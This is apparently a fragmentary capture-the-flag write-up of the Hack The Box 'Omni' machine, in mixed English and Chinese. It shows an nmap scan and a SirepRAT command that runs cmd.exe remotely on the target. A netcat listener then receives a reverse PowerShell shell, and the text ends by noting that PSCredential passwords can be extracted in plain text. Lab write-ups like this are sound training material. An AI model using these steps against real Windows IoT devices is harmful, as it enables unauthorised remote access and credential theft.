# Nmap 7.80 scan initiated Sun Sep 6 19:07:02 2020 as: nmap -p- -sC -sV -oN nmap/initial 10.10.10.204 Nmap scan report for 10.10.10.204 Host is up (0.075s latency). Not shown: 65529 filtered ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 5985/tcp open upnp Microsoft IIS httpd 8080/tcp open upnp Microsoft IIS httpd | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=Windows Device Portal |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Site doesn't have a title. 29817/tcp open unknown 29819/tcp open arcserve ARCserve Discovery 29820/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port29820-TCP:V=7.80%I=7%D=9/6%Time=5F54C3C4%P=x86_64-pc-linux-gnu%r(NU SF:LL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"\ SF:*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04 SF:G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc SF:9}\xc8O\x12"); Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Sep 6 19:12:12 2020 -- 1 IP address (1 host up) scanned in 310.26 seconds
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni/SirepRAT] └──╼ $python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c dir C:\\" --v --------- Volume in drive C is MainOS Volume Serial Number is 3C37-C677
─[matt@parrot]─[~/Documents/HTB/Boxes/Omni] [14/14] └──╼ $nc -nlvp 1337 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.10.204. Ncat: Connection from 10.10.10.204:49682. Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\windows\system32> $env:username $env:username DefaultAccount PS C:\>
User && Root.txt
我们看到Users下没有任何用户,用户全存在Data下的User内,且常见的枚举工具包括winPEAS.exe也无法使用,尝试查找所有 bat vbs txt等常见的文件,发现可以的隐藏文件r.bat
However, some cmdlet does not utilize the SecureString and require password in plain text. The SecureString object in this case will need to be decrypted into to plain text. If the account information has been constructed into a PSCredential object, the password could be extracted in plain text.